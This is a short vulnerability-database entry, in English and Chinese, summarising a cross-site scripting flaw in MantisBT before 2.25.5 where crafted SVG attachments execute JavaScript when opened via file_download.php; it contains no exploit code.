Vulnerability Information
Although we use advanced large model technology, its output may still contain inaccurate or outdated information.Shenlong tries to ensure data accuracy, but please verify and judge based on the actual situation.
Vulnerability Title
N/A
Vulnerability Description
An XSS vulnerability in MantisBT before 2.25.5 allows remote attackers to attach crafted SVG documents to issue reports or bugnotes. When a user or an admin clicks on the attachment, file_download.php opens the SVG document in a browser tab instead of downloading it as a file, causing the JavaScript code to execute.
CVSS Information
N/A
Vulnerability Type
N/A
Vulnerability Title
MantisBT 跨站脚本漏洞
Vulnerability Description
MantisBT是Mantisbt团队的一套基于Web的开源缺陷跟踪系统。该系统以Web操作的形式提供项目管理及缺陷跟踪服务。 MantisBT 2.25.5之前版本存在安全漏洞,该漏洞源于允许远程攻击者附加精心制作的 SVG 文档以发布报告或错误说明,当用户或管理员单击附件时,file_download.php 会在浏览器选项卡中打开 SVG 文档,而不是将其作为文件下载,从而导致 JavaScript 代码执行。
CVSS Information
N/A
Vulnerability Type
N/A